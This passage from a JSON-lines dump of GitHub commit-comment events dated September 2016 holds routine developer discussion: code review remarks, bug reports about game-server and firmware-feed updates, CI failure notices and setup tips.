.\\n\\u003e\\n\"}],\"action\":{\"name\":\"View Commit\",\"url\":\"https://github.com/jleahy7/CSCI-2999-Capstone_Project/commit/796319b13290c91169385feb8786f6d3da44831c#commitcomment-19041157\"}}}"}},"created_at":"2016-09-15T18:49:37Z"}
{"id":"4569990314","type":"CommitCommentEvent","actor":{"login":"Gumballz"},"repo":{"name":"FezVrasta/ark-server-tools"},"payload":{"comment":{"id":19042242,"position":null,"line":null,"path":null,"commit_id":"3dc8ef100e06107dfe8b2bb07a239183a1483355","created_at":"2016-09-15T18:50:07Z","updated_at":"2016-09-15T18:50:07Z","body":"Doesn't appear to be working.\r\n\r\nafter running \r\n `arkmanager update --update-mods --saveworld --backup --                                                                             warn @island`\r\n on the 2nd sintance, Arkmanager reported\r\n`Your server is already up to date! The most recent version is 1337837.`\r\n\r\nArkmanager status report..\r\n```\r\n Server running:   Yes\r\n Server listening:   Yes\r\nServer Name: sARKarium.com UK PVE Scorched Earth - (v247.3)\r\nPlayers: 5 / 50\r\n Server online:   Yes\r\n ARKServers link:   http://arkservers.net/server/164.132.201.19:27015\r\n Server version:   1337837\r\nRunning command 'status' for instance 'island'\r\n Server running:   Yes\r\n Server listening:   Yes\r\nServer Name: sARKarium.com UK PVE 2x Modz - (v247.2)\r\nPlayers: 11 / 50\r\n Server online:   Yes\r\n ARKServers link:   http://arkservers.net/server/164.132.201.19:27025\r\n Server version:   1337837\r\n\r\n```"}},"created_at":"2016-09-15T18:50:07Z"}
{"id":"4569994357","type":"CommitCommentEvent","actor":{"login":"sampsongao"},"repo":{"name":"nodejs/abi-stable-node"},"payload":{"comment":{"id":19042258,"position":19,"line":52,"path":"src/node_jsvmapi.cc","commit_id":"2fdf4e86f7a08596c5fc0588c11865168699a774","created_at":"2016-09-15T18:50:50Z","updated_at":"2016-09-15T18:50:50Z","body":"Do I need to do anything to address it for now?"}},"created_at":"2016-09-15T18:50:50Z"}
{"id":"4569997398","type":"CommitCommentEvent","actor":{"login":"fashaikh"},"repo":{"name":"projectkudu/AzureFunctionsPortal"},"payload":{"comment":{"id":19042263,"position":null,"line":null,"path":null,"commit_id":"2e1d7a7e2dc77a4b117fcf7fa18b4b35be6c13f3","created_at":"2016-09-15T18:51:23Z","updated_at":"2016-09-15T18:51:23Z","body":"@shekhargupta1988 : Could you comment on this ?"}},"created_at":"2016-09-15T18:51:23Z"}
{"id":"4569998144","type":"CommitCommentEvent","actor":{"login":"pichalite"},"repo":{"name":"pichalite/nodebb-theme-material"},"payload":{"comment":{"id":19042266,"position":null,"line":null,"path":null,"commit_id":"59ad1214b1427a82fbdfcd6cf41504961cac51e1","created_at":"2016-09-15T18:51:31Z","updated_at":"2016-09-15T18:51:31Z","body":"closes #51 "}},"created_at":"2016-09-15T18:51:31Z"}
{"id":"4569998770","type":"CommitCommentEvent","actor":{"login":"hdmedina"},"repo":{"name":"hdmedina/prueba"},"payload":{"comment":{"id":19042268,"position":null,"line":null,"path":null,"commit_id":"1ab440471b8c0f1206f7b3b20921456ceb0048f3","created_at":"2016-09-15T18:51:37Z","updated_at":"2016-09-15T18:51:37Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;4sb5KKFa&#x2F;1-wqewe\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> wqewe</a>"}},"created_at":"2016-09-15T18:51:37Z"}
{"id":"4569999386","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19042270,"position":7,"line":253,"path":"src/utils/polygon.h","commit_id":"72e4bf8069f50ab8b4e11552d5eac29424bfda88","created_at":"2016-09-15T18:51:44Z","updated_at":"2016-09-15T18:51:44Z","body":"Maximum can be an adjective as well btw."}},"created_at":"2016-09-15T18:51:44Z"}
{"id":"4570003281","type":"CommitCommentEvent","actor":{"login":"ahmelsayed"},"repo":{"name":"projectkudu/AzureFunctionsPortal"},"payload":{"comment":{"id":19042280,"position":null,"line":null,"path":null,"commit_id":"2e1d7a7e2dc77a4b117fcf7fa18b4b35be6c13f3","created_at":"2016-09-15T18:52:23Z","updated_at":"2016-09-15T18:52:23Z","body":"oh sorry for whatever reason I thought this was log streaming, not pulse. You're right, pulse won't work with basic auth."}},"created_at":"2016-09-15T18:52:23Z"}
{"id":"4570004347","type":"CommitCommentEvent","actor":{"login":"sampsongao"},"repo":{"name":"nodejs/abi-stable-node"},"payload":{"comment":{"id":19042284,"position":28,"line":805,"path":"src/node_jsvmapi.cc","commit_id":"b2b66198a7449a923d99a5078e021d85047c90d1","created_at":"2016-09-15T18:52:33Z","updated_at":"2016-09-15T18:52:33Z","body":"Yes, I think older node create new buffer by copying data, just like buffer_copy in newer version."}},"created_at":"2016-09-15T18:52:33Z"}
{"id":"4570006499","type":"CommitCommentEvent","actor":{"login":"Ipmanchess"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19042286,"position":null,"line":null,"path":null,"commit_id":"35c393d367b6d8bcaac4cb459010e1b3e46f8a08","created_at":"2016-09-15T18:52:54Z","updated_at":"2016-09-15T18:52:54Z","body":"I would like to know on which system they are running:\r\nCoffeeOne -> Windows -> AMD or Intel cpu's?\r\nSterni1971 -> Linux -> AMD or Intel cpu's?\r\n"}},"created_at":"2016-09-15T18:52:54Z"}
{"id":"4570009439","type":"CommitCommentEvent","actor":{"login":"zhemao"},"repo":{"name":"ucb-bar/rocket-chip"},"payload":{"comment":{"id":19042293,"position":null,"line":null,"path":null,"commit_id":"f5db83a72ff2938cbd10a16ceadf630f9f366961","created_at":"2016-09-15T18:53:25Z","updated_at":"2016-09-15T18:53:25Z","body":"I believe the intention of Knobs was for performance tuning. It makes sense to tune the cache parameters, since changing those have no effect on software but could have implications on system performance.\r\n\r\nChanging the number of tiles definitely affects software's view of the system."}},"created_at":"2016-09-15T18:53:25Z"}
{"id":"4570010057","type":"CommitCommentEvent","actor":{"login":"kphillisjr"},"repo":{"name":"cyclaero/cocotron"},"payload":{"comment":{"id":19042295,"position":4,"line":648,"path":"Foundation/platform_windows/NSFileManager_win32.m","commit_id":"6956a228bcc214c6ebd56fddacdc95aa9bba3ff6","created_at":"2016-09-15T18:53:31Z","updated_at":"2016-09-15T18:53:31Z","body":"Small typo... \"retunrs\" Should be spelled as \"returns\""}},"created_at":"2016-09-15T18:53:31Z"}
{"id":"4570018502","type":"CommitCommentEvent","actor":{"login":"esiefkas"},"repo":{"name":"esiefkas/dotfiles"},"payload":{"comment":{"id":19042325,"position":5,"line":49,"path":"scripts/ensure-symlinked.sh","commit_id":"fb64d9a8bedd4602029e11e597a9c0e8a2067496","created_at":"2016-09-15T18:54:54Z","updated_at":"2016-09-15T18:54:54Z","body":"can't remember exactly...I can figure that out\r\n"}},"created_at":"2016-09-15T18:54:54Z"}
{"id":"4570019954","type":"CommitCommentEvent","actor":{"login":"esiefkas"},"repo":{"name":"esiefkas/dotfiles"},"payload":{"comment":{"id":19042327,"position":3,"line":3,"path":"scripts/install-lein-linux.sh","commit_id":"fb64d9a8bedd4602029e11e597a9c0e8a2067496","created_at":"2016-09-15T18:55:12Z","updated_at":"2016-09-15T18:55:12Z","body":":+1: \r\n"}},"created_at":"2016-09-15T18:55:12Z"}
{"id":"4570026054","type":"CommitCommentEvent","actor":{"login":"shivani329"},"repo":{"name":"shivani329/phase-0-tracks"},"payload":{"comment":{"id":19042338,"position":null,"line":null,"path":null,"commit_id":"2046240e373b9f34af126c0289c952573ca6b04c","created_at":"2016-09-15T18:56:09Z","updated_at":"2016-09-15T18:56:09Z","body":"I meant release 0, 1, and starting 2"}},"created_at":"2016-09-15T18:56:09Z"}
{"id":"4570026242","type":"CommitCommentEvent","actor":{"login":"gre"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":19042340,"position":null,"line":null,"path":null,"commit_id":"eb3360b02ab82d20bc3c3f38f543b0d742598346","created_at":"2016-09-15T18:56:09Z","updated_at":"2016-09-15T18:56:09Z","body":"FYI some libs (gl-react-native, react-native-material-kit) used to rely on doing `animatedElement.refs.node` and this is a breaking changes for them.\r\na fix is to rely on ``animatedElement._component` now..\r\nWhat do you think about having a `getComponent()` method? the thing is you want to be able to create an animated component but also be able to get the underlying ref."}},"created_at":"2016-09-15T18:56:09Z"}
{"id":"4570026991","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19042343,"position":null,"line":null,"path":null,"commit_id":"8da05fb95d49c6cdd0190d2e6b5160e6eeb9e31d","created_at":"2016-09-15T18:56:17Z","updated_at":"2016-09-15T18:56:17Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35477/testReport/) for this commit**"}},"created_at":"2016-09-15T18:56:17Z"}
{"id":"4570028396","type":"CommitCommentEvent","actor":{"login":"esiefkas"},"repo":{"name":"esiefkas/dotfiles"},"payload":{"comment":{"id":19042345,"position":5,"line":15,"path":"scripts/setup.sh","commit_id":"fb64d9a8bedd4602029e11e597a9c0e8a2067496","created_at":"2016-09-15T18:56:30Z","updated_at":"2016-09-15T18:56:30Z","body":":+1: "}},"created_at":"2016-09-15T18:56:30Z"}
{"id":"4570029714","type":"CommitCommentEvent","actor":{"login":"jdonaldson"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19042354,"position":104,"line":1967,"path":"src/generators/genlua.ml","commit_id":"00b30d1ced53039f60db8ec434995d486e4fcec8","created_at":"2016-09-15T18:56:44Z","updated_at":"2016-09-15T18:56:44Z","body":"I'm up in the air on this.  I could argue that this is a bad idea (have a single variable control \"break\" conditions across all while blocks).  However the alternative (one variable per while block) would potentially cause a lot of overhead. I guess I should try and do some kind of benchmark."}},"created_at":"2016-09-15T18:56:44Z"}
{"id":"4570029867","type":"CommitCommentEvent","actor":{"login":"stephwright"},"repo":{"name":"stephwright/PNWData"},"payload":{"comment":{"id":19042355,"position":null,"line":null,"path":null,"commit_id":"d208565e0c55b0eaec7f404217aeaa33059b1461","created_at":"2016-09-15T18:56:46Z","updated_at":"2016-09-15T18:56:46Z","body":"I think docs is as good a place as any unless you want to create a new folder with something you feel is more appropriate?  I'm open to suggestions :)"}},"created_at":"2016-09-15T18:56:46Z"}
{"id":"4570032504","type":"CommitCommentEvent","actor":{"login":"esiefkas"},"repo":{"name":"esiefkas/dotfiles"},"payload":{"comment":{"id":19042359,"position":92,"line":132,"path":"scripts/setup.sh","commit_id":"fb64d9a8bedd4602029e11e597a9c0e8a2067496","created_at":"2016-09-15T18:57:14Z","updated_at":"2016-09-15T18:57:14Z","body":":+1: "}},"created_at":"2016-09-15T18:57:14Z"}
{"id":"4570032773","type":"CommitCommentEvent","actor":{"login":"woudini"},"repo":{"name":"blockchain/My-Wallet-V3-iOS"},"payload":{"comment":{"id":19042360,"position":null,"line":null,"path":null,"commit_id":"27e0ad8687cf612af26cfb72c076679901150ea9","created_at":"2016-09-15T18:57:16Z","updated_at":"2016-09-15T18:57:16Z","body":"The reason to use `[NSLocale currentLocale]` over `textInputMode` is that `textInputMode.primaryLanguage` will still be `en-US` for languages like German, which use a different decimal separator. The `primaryLanguage` property seems be useful only for detecting keyboard input for Eastern Arabic numerals."}},"created_at":"2016-09-15T18:57:16Z"}
{"id":"4570033224","type":"CommitCommentEvent","actor":{"login":"DronMDF"},"repo":{"name":"joaander/upp11"},"payload":{"comment":{"id":19042361,"position":null,"line":null,"path":null,"commit_id":"8be99527a1e393ec2721831032bce5c23a0c6873","created_at":"2016-09-15T18:57:20Z","updated_at":"2016-09-15T18:57:20Z","body":"You are using my framework?\r\nHow impressions?"}},"created_at":"2016-09-15T18:57:20Z"}
{"id":"4570033399","type":"CommitCommentEvent","actor":{"login":"compugician"},"repo":{"name":"stersin/HX711"},"payload":{"comment":{"id":19042362,"position":null,"line":null,"path":null,"commit_id":"52bf51610ccd8ec7843d55a27476dc83dc5fbf07","created_at":"2016-09-15T18:57:22Z","updated_at":"2016-09-15T18:57:22Z","body":"Are you sure this makes things work? Could you share your reasoning? I'm working on a different branch of the same."}},"created_at":"2016-09-15T18:57:22Z"}
{"id":"4570033420","type":"CommitCommentEvent","actor":{"login":"ionutvmi"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":19042363,"position":6,"line":27,"path":"extensions/html/package.json","commit_id":"2db3796f65672a5a3ebf7ea619b11d4e74ae4a88","created_at":"2016-09-15T18:57:22Z","updated_at":"2016-09-15T18:57:22Z","body":"spaces or tabs ?"}},"created_at":"2016-09-15T18:57:22Z"}
{"id":"4570033882","type":"CommitCommentEvent","actor":{"login":"esiefkas"},"repo":{"name":"esiefkas/dotfiles"},"payload":{"comment":{"id":19042365,"position":91,"line":131,"path":"scripts/setup.sh","commit_id":"fb64d9a8bedd4602029e11e597a9c0e8a2067496","created_at":"2016-09-15T18:57:27Z","updated_at":"2016-09-15T18:57:27Z","body":"yep, I'll see if it's been updated since"}},"created_at":"2016-09-15T18:57:27Z"}
{"id":"4570035864","type":"CommitCommentEvent","actor":{"login":"avigad"},"repo":{"name":"leanprover/lean"},"payload":{"comment":{"id":19042370,"position":11,"line":11,"path":"tests/lean/run/let3.lean","commit_id":"0b90ace9f8b284b7ef96d826a42842ac58dcadec","created_at":"2016-09-15T18:57:48Z","updated_at":"2016-09-15T18:57:48Z","body":"We can't define `obtain` in that way (for using in proving theorems), because we want to use it to destruct an exists, and that will only eliminate to `Prop`.\r\n\r\nBut programmers will use `let` for data assignments. I don't have a sense of what is more natural or intuitive there."}},"created_at":"2016-09-15T18:57:48Z"}
{"id":"4570042857","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19042389,"position":null,"line":null,"path":null,"commit_id":"f89c0c05c47cf34de3d5d93062d9040ed51a9cba","created_at":"2016-09-15T18:59:06Z","updated_at":"2016-09-15T18:59:06Z","body":"btw: What's the reason for next vs. next-p3 und which one will 5.4 be based on?"}},"created_at":"2016-09-15T18:59:06Z"}
{"id":"4570044297","type":"CommitCommentEvent","actor":{"login":"thomasvl"},"repo":{"name":"thomasvl/protobuf"},"payload":{"comment":{"id":19042392,"position":25,"line":111,"path":"objectivec/GPBBootstrap.h","commit_id":"fd36b4d5d23ddd2ced416a98523225ce30e20925","created_at":"2016-09-15T18:59:20Z","updated_at":"2016-09-15T18:59:20Z","body":"Done"}},"created_at":"2016-09-15T18:59:20Z"}
{"id":"4570044585","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19042393,"position":null,"line":null,"path":null,"commit_id":"f89c0c05c47cf34de3d5d93062d9040ed51a9cba","created_at":"2016-09-15T18:59:23Z","updated_at":"2016-09-15T18:59:23Z","body":"i build\r\nopkg  update\r\nopkg upgrade\r\nand not all gets properly updated - errors about circular dependencies and enigma2 crashes after reboot - e.g.:\r\n20:17:57.6856 { D }   File \"/usr/lib/python2.7/site-packages/twisted/python/filepath.py\", line 16, in <module>\r\n20:17:57.6860 { D } ImportError: cannot import name sha1\r\n\r\nflashing the new image works fine. Just the feed upgrade process is not properly working."}},"created_at":"2016-09-15T18:59:23Z"}
{"id":"4570045296","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19042396,"position":null,"line":null,"path":null,"commit_id":"eb2ab9d74428af645373a67a02f7489172270083","created_at":"2016-09-15T18:59:31Z","updated_at":"2016-09-15T18:59:31Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35478/testReport/) for this commit**"}},"created_at":"2016-09-15T18:59:31Z"}
{"id":"4570047134","type":"CommitCommentEvent","actor":{"login":"liach"},"repo":{"name":"DemonWav/MinecraftDevIntelliJ"},"payload":{"comment":{"id":19042401,"position":10,"line":10,"path":"src/main/java/com/demonwav/mcdev/update/Channels.java","commit_id":"d9efde22047f66bf5df940c12a2a8d5ab6f62939","created_at":"2016-09-15T18:59:49Z","updated_at":"2016-09-15T18:59:49Z","body":"What do you mean?"}},"created_at":"2016-09-15T18:59:49Z"}
{"id":"4570047466","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19042404,"position":null,"line":null,"path":null,"commit_id":"98ed6daa2dcb8b1f20e87bd607be9de076900a2e","created_at":"2016-09-15T18:59:53Z","updated_at":"2016-09-15T18:59:53Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35479/testReport/) for this commit**"}},"created_at":"2016-09-15T18:59:53Z"}
{"id":"4570051171","type":"CommitCommentEvent","actor":{"login":"m-vdb"},"repo":{"name":"m-vdb/confluence-python"},"payload":{"comment":{"id":19042412,"position":null,"line":null,"path":null,"commit_id":"bbc759742f22c1a27a8b36dc736bc6b7716f0776","created_at":"2016-09-15T19:00:33Z","updated_at":"2016-09-15T19:00:33Z","body":"feel free to fork, I'm not the initial developer of this project and I'm no longer using it :)"}},"created_at":"2016-09-15T19:00:33Z"}
{"id":"4570053970","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19042419,"position":null,"line":null,"path":null,"commit_id":"f89c0c05c47cf34de3d5d93062d9040ed51a9cba","created_at":"2016-09-15T19:01:02Z","updated_at":"2016-09-15T19:01:02Z","body":"next was gcc6\r\nnext-p3 will probably be new build for atv 6 - gcc6 python core update"}},"created_at":"2016-09-15T19:01:02Z"}
{"id":"4570054494","type":"CommitCommentEvent","actor":{"login":"scoter40"},"repo":{"name":"scoter40/hello-world"},"payload":{"comment":{"id":19042420,"position":null,"line":null,"path":null,"commit_id":"dfa45f710f33bd32b14fc052d7d47e06b81cbbfe","created_at":"2016-09-15T19:01:09Z","updated_at":"2016-09-15T19:01:09Z","body":"Just a basic tutorial"}},"created_at":"2016-09-15T19:01:09Z"}
{"id":"4570054853","type":"CommitCommentEvent","actor":{"login":"thomasvl"},"repo":{"name":"thomasvl/protobuf"},"payload":{"comment":{"id":19042422,"position":26,"line":112,"path":"objectivec/GPBBootstrap.h","commit_id":"fd36b4d5d23ddd2ced416a98523225ce30e20925","created_at":"2016-09-15T19:01:12Z","updated_at":"2016-09-15T19:01:12Z","body":"Done"}},"created_at":"2016-09-15T19:01:12Z"}
{"id":"4570056701","type":"CommitCommentEvent","actor":{"login":"Marcospgg"},"repo":{"name":"Marcospgg/Hello-World"},"payload":{"comment":{"id":19042427,"position":1,"line":1,"path":"README.md","commit_id":"49a3fcef218fcf914411f86c944623ab2093ab41","created_at":"2016-09-15T19:01:30Z","updated_at":"2016-09-15T19:01:30Z","body":" teste"}},"created_at":"2016-09-15T19:01:30Z"}
{"id":"4570057241","type":"CommitCommentEvent","actor":{"login":"thomasvl"},"repo":{"name":"thomasvl/protobuf"},"payload":{"comment":{"id":19042429,"position":30,"line":116,"path":"objectivec/GPBBootstrap.h","commit_id":"fd36b4d5d23ddd2ced416a98523225ce30e20925","created_at":"2016-09-15T19:01:36Z","updated_at":"2016-09-15T19:01:36Z","body":"Done"}},"created_at":"2016-09-15T19:01:36Z"}
{"id":"4570057998","type":"CommitCommentEvent","actor":{"login":"AmatCoder"},"repo":{"name":"AmatCoder/mednaffe"},"payload":{"comment":{"id":19042431,"position":null,"line":null,"path":null,"commit_id":"82e14dcf392dd0b876343cd8b58caa25029a76f4","created_at":"2016-09-15T19:01:45Z","updated_at":"2016-09-15T19:01:45Z","body":"Yes, I should to release a stable version but I have not time right now.\r\nThis is just a 'quick-and-dirty' release for Windows users."}},"created_at":"2016-09-15T19:01:45Z"}
{"id":"4570059885","type":"CommitCommentEvent","actor":{"login":"thomasvl"},"repo":{"name":"thomasvl/protobuf"},"payload":{"comment":{"id":19042435,"position":31,"line":117,"path":"objectivec/GPBBootstrap.h","commit_id":"fd36b4d5d23ddd2ced416a98523225ce30e20925","created_at":"2016-09-15T19:02:06Z","updated_at":"2016-09-15T19:02:06Z","body":"Done"}},"created_at":"2016-09-15T19:02:06Z"}
{"id":"4570060745","type":"CommitCommentEvent","actor":{"login":"skm2696"},"repo":{"name":"skm2696/stack"},"payload":{"comment":{"id":19042437,"position":null,"line":null,"path":null,"commit_id":"762a5f01fb3d6074787de933f28d015e746d78ac","created_at":"2016-09-15T19:02:15Z","updated_at":"2016-09-15T19:02:15Z","body":"Задание 1"}},"created_at":"2016-09-15T19:02:15Z"}
{"id":"4570061233","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19042441,"position":null,"line":null,"path":null,"commit_id":"c931e86f40ace33510eac7c4b5ecdc3eff535b90","created_at":"2016-09-15T19:02:20Z","updated_at":"2016-09-15T19:02:20Z","body":"The following doc(s) have been deployed to the [slashzerop](https://slashzerop-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/unsupported-modules-plugins](https://slashzerop-static-docs.pantheonsite.io/docs/unsupported-modules-plugins)\n"}},"created_at":"2016-09-15T19:02:20Z"}
{"id":"4570061558","type":"CommitCommentEvent","actor":{"login":"burak13"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19042442,"position":null,"line":null,"path":null,"commit_id":"35c393d367b6d8bcaac4cb459010e1b3e46f8a08","created_at":"2016-09-15T19:02:24Z","updated_at":"2016-09-15T19:02:24Z","body":"@Ipmanchess off topic but what does \"R1n\" stand for in \"Stockfish 060916 64 BMI2R1n 8c\". I closely follow your rating list great work there, but sometimes it's hard to understand these kind of abbreviations."}},"created_at":"2016-09-15T19:02:24Z"}
{"id":"4570063387","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19042448,"position":null,"line":null,"path":null,"commit_id":"7d4bf9ef14deff788b6a1dc70ef8df05998aa92e","created_at":"2016-09-15T19:02:42Z","updated_at":"2016-09-15T19:02:42Z","body":"**[unitTests_php_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_php_branches/35480/testReport/) for this commit**"}},"created_at":"2016-09-15T19:02:42Z"}
{"id":"4570063925","type":"CommitCommentEvent","actor":{"login":"sorey14"},"repo":{"name":"sorey14/yii2-repository"},"payload":{"comment":{"id":19042451,"position":null,"line":null,"path":null,"commit_id":"04832e86495a7f2f4b7c10f5a23738d9b1a85622","created_at":"2016-09-15T19:02:49Z","updated_at":"2016-09-15T19:02:49Z","body":"yii2 repository"}},"created_at":"2016-09-15T19:02:49Z"}
{"id":"4570064651","type":"CommitCommentEvent","actor":{"login":"thomasvl"},"repo":{"name":"thomasvl/protobuf"},"payload":{"comment":{"id":19042453,"position":24,"line":81,"path":"objectivec/GPBUtilities.m","commit_id":"fd36b4d5d23ddd2ced416a98523225ce30e20925","created_at":"2016-09-15T19:02:57Z","updated_at":"2016-09-15T19:02:57Z","body":"Done"}},"created_at":"2016-09-15T19:02:57Z"}
{"id":"4570072727","type":"CommitCommentEvent","actor":{"login":"HybridDog"},"repo":{"name":"minetest/minetest_game"},"payload":{"comment":{"id":19042479,"position":31,"line":140,"path":"mods/stairs/init.lua","commit_id":"b848e35ca59c9eea3dbe3df87cb14d6bfea93f9a","created_at":"2016-09-15T19:04:21Z","updated_at":"2016-09-15T19:04:21Z","body":"ignore does not wreak havoc in my experience, l disabled the \"fucks up stuff\" prevention and placed it without problems\r\n\r\nAnyway, a crash caused by placing ignore doesn't need to be stymied and the under test should be removed to not bemuse reviewing people."}},"created_at":"2016-09-15T19:04:21Z"}
{"id":"4570074546","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19042482,"position":null,"line":null,"path":null,"commit_id":"f89c0c05c47cf34de3d5d93062d9040ed51a9cba","created_at":"2016-09-15T19:04:41Z","updated_at":"2016-09-15T19:04:41Z","body":"I'll have a look at it in any case."}},"created_at":"2016-09-15T19:04:41Z"}
{"id":"4570077927","type":"CommitCommentEvent","actor":{"login":"devinivy"},"repo":{"name":"WilliamSWoodruff/mail-licker"},"payload":{"comment":{"id":19042495,"position":8,"line":15,"path":"lib/index.js","commit_id":"7159a1233298c6f23f1f37f729ff0929bf9c3a99","created_at":"2016-09-15T19:05:16Z","updated_at":"2016-09-15T19:05:16Z","body":"It's totally a common misconception.  Arrows get the `this` from their surrounding closure 👍 "}},"created_at":"2016-09-15T19:05:16Z"}
{"id":"4570080963","type":"CommitCommentEvent","actor":{"login":"peterdd"},"repo":{"name":"Flyspray/flyspray"},"payload":{"comment":{"id":19042511,"position":null,"line":null,"path":null,"commit_id":"cf5298a53ea8454eb0ed7d3a63d6f780f140aba4","created_at":"2016-09-15T19:05:47Z","updated_at":"2016-09-15T19:05:47Z","body":"Note: Better use the now default \"crypt\" with CRYPT_SHA512 instead of unsalted hash('sha512', $pw)\r\nSee http://php.net/manual/en/function.crypt.php\r\n\r\npassword_hash() / crypt() with CRYPT_SHA512 generates max 123 Byte. \r\n( $6$rounds=123456789$max16bytesaltstr$86bytes )\r\n\r\nSo 128 char field size for user_pass should be enough for all current possible cases."}},"created_at":"2016-09-15T19:05:47Z"}
{"id":"4570082424","type":"CommitCommentEvent","actor":{"login":"ezio84"},"repo":{"name":"PureNexusProject/android_build"},"payload":{"comment":{"id":19042517,"position":null,"line":null,"path":null,"commit_id":"01bf440ae9cbf253d3a35137bb561457edc66d08","created_at":"2016-09-15T19:06:04Z","updated_at":"2016-09-15T19:06:04Z","body":";D have fun with the family dude, tnx as usual"}},"created_at":"2016-09-15T19:06:04Z"}
{"id":"4570083217","type":"CommitCommentEvent","actor":{"login":"kellyredding"},"repo":{"name":"redding/sanford-nm"},"payload":{"comment":{"id":19042521,"position":null,"line":null,"path":null,"commit_id":"225f5d78660ac36b24cb12d74d8ae572f7bbc45a","created_at":"2016-09-15T19:06:13Z","updated_at":"2016-09-15T19:06:13Z","body":"/cc @jcredding "}},"created_at":"2016-09-15T19:06:13Z"}
{"id":"4570084079","type":"CommitCommentEvent","actor":{"login":"kellyredding"},"repo":{"name":"redding/sanford-nm"},"payload":{"comment":{"id":19042526,"position":null,"line":null,"path":null,"commit_id":"dc9cd83045b91be04266b97771614d88b4fdf131","created_at":"2016-09-15T19:06:21Z","updated_at":"2016-09-15T19:06:21Z","body":"/cc @jcredding "}},"created_at":"2016-09-15T19:06:21Z"}
{"id":"4570084222","type":"CommitCommentEvent","actor":{"login":"jamiew"},"repo":{"name":"jamiew/capitalismworksfor.me"},"payload":{"comment":{"id":19042527,"position":null,"line":null,"path":null,"commit_id":"7cdfa4f54053773dc9b1e5d1b3bab64fcfe3cdd2","created_at":"2016-09-15T19:06:22Z","updated_at":"2016-09-15T19:06:22Z","body":"It's in `app/assets/stylesheets/application.css`\n\nThe run the whole thing, you need a relatively recent ruby + `gem install\nbundler foreman`, then:\n\n```\nbundle install\nforeman start\n```\n\nand you should be able to access locally. I think it's port 8000\n\nOn Wed, Sep 14, 2016 at 3:02 PM, Steve Lambert <notifications@github.com>\nwrote:\n\n> Thanks! So this includes the files, but it still needs to be added to the\n> CSS right? Where do I access the CSS on this here thing?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jamiew/capitalismworksfor.me/commit/7cdfa4f54053773dc9b1e5d1b3bab64fcfe3cdd2#commitcomment-19024929>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAAHbzCRJ5P7wN78QYuINiDCLqs0y8A2ks5qqES6gaJpZM4J87TN>\n> .\n>\n"}},"created_at":"2016-09-15T19:06:22Z"}
{"id":"4570089101","type":"CommitCommentEvent","actor":{"login":"Ipmanchess"},"repo":{"name":"mcostalba/Stockfish"},"payload":{"comment":{"id":19042539,"position":null,"line":null,"path":null,"commit_id":"35c393d367b6d8bcaac4cb459010e1b3e46f8a08","created_at":"2016-09-15T19:07:11Z","updated_at":"2016-09-15T19:07:11Z","body":"Hi burak..it's a version from Ronald Stockfish+Numa ..so R1n = Ronald first version with numa ;)"}},"created_at":"2016-09-15T19:07:11Z"}
{"id":"4570090953","type":"CommitCommentEvent","actor":{"login":"skm2696"},"repo":{"name":"skm2696/stack"},"payload":{"comment":{"id":19042543,"position":null,"line":null,"path":null,"commit_id":"c0e4237cd5d5859a912824facac65dd8e9399098","created_at":"2016-09-15T19:07:29Z","updated_at":"2016-09-15T19:07:29Z","body":"задание 2"}},"created_at":"2016-09-15T19:07:29Z"}
{"id":"4570095327","type":"CommitCommentEvent","actor":{"login":"arn354"},"repo":{"name":"oe-alliance/oe-alliance-core"},"payload":{"comment":{"id":19042554,"position":null,"line":null,"path":null,"commit_id":"f89c0c05c47cf34de3d5d93062d9040ed51a9cba","created_at":"2016-09-15T19:08:18Z","updated_at":"2016-09-15T19:08:18Z","body":"no crashes if you flash the image new. \r\nSo serverside and on feeds all properly packages are available. \r\nSome packages which rely on python might have been rebuild - but with same version (no AUTO-PR). opkg is stupid - does not do a md5hash compare but a simple version number compare. \r\n1.4.1 is installed, on feeds also 1.4.1 - no need to install. But in fact the one on the feeds has changed."}},"created_at":"2016-09-15T19:08:18Z"}
